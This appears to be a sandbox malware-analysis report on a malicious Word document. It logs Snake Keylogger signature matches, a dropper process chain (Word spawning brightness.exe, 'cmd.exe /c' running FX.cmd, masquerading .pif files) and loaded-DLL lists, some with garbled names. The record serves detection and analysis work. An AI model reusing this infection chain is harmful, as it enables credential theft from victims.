Source: Process Memory Space: jphwmyiA.pif PID: 2228, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: jphwmyiA.pif PID: 5476, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.jphwmyiA.pif.25f2a8c6.2.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.3.jphwmyiA.pif.24507b80.0.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, -j.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.jphwmyiA.pif.28fc0000.6.raw.unpack, -.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.jphwmyiA.pif.28730ee8.4.raw.unpack, WP6RZJql8gZrNhVA9v.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winDOC@24/10@5/6

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 8_2_02837F52 GetDiskFreeSpaceA,

8_2_02837F52

Source: C:\Users\Public\Libraries\jphwmyiA.pif

Code function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

12_2_004019F0

Source: C:\Windows\SysWOW64\brightness.exe

Code function: 8_2_02846D48 CoCreateInstance,

8_2_02846D48

Source: C:\Users\Public\Libraries\jphwmyiA.pif

12_2_004019F0

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\Desktop\~$Q-0092025.doc

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4500:120:WilError_03
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7140:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_03

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\{56B8ADF2-C709-4723-A43C-184BF45757B6} - OProcSessId.dat

Jump to behavior

Source: ENQ-0092025.doc

OLE indicator, Word Document stream: true

Source: ENQ-0092025.doc

OLE document summary: title field not present or empty

Source: C:\Users\Public\Libraries\jphwmyiA.pif	Command line argument: 08A	12_2_00413780
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Command line argument: 08A	16_2_00413780
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Command line argument: 08A	16_2_00413780
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Command line argument: 08A	16_1_00413780

Source: C:\Windows\SysWOW64\brightness.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\brightness.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: jphwmyiA.pif, 0000000C.00000003.2550294601.000000002730C000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000010.00000003.2622931732.000000001B58C000.00000004.00000800.00020000.00000000.sdmp, jphwmyiA.pif, 00000014.00000003.2639787175.000000002B4FD000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: ENQ-0092025.doc

ReversingLabs: Detection: 57%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\brightness.exe C:\Windows\SysWOW64\brightness.exe
Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Aiymwhpj.PIF "C:\Users\Public\Libraries\Aiymwhpj.PIF"
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
Source: unknown	Process created: C:\Users\Public\Libraries\Aiymwhpj.PIF "C:\Users\Public\Libraries\Aiymwhpj.PIF"
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	Process created: C:\Windows\SysWOW64\brightness.exe C:\Windows\SysWOW64\brightness.exe	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Process created: C:\Users\Public\Libraries\jphwmyiA.pif C:\Users\Public\Libraries\jphwmyiA.pif

Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: url.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ieproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winhttpcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??????????.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ???.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: am.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ????.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ???e???????????.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ?.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: ??l.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: tquery.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: mssip32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: endpointdlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: advapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppwmi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppcext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\brightness.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Users\Public\Libraries\jphwmyiA.pif	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: version.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: url.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: smartscreenps.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\Public\Libraries\Aiymwhpj.PIF	Section loaded: windows.storage.dll	Jump to behavior
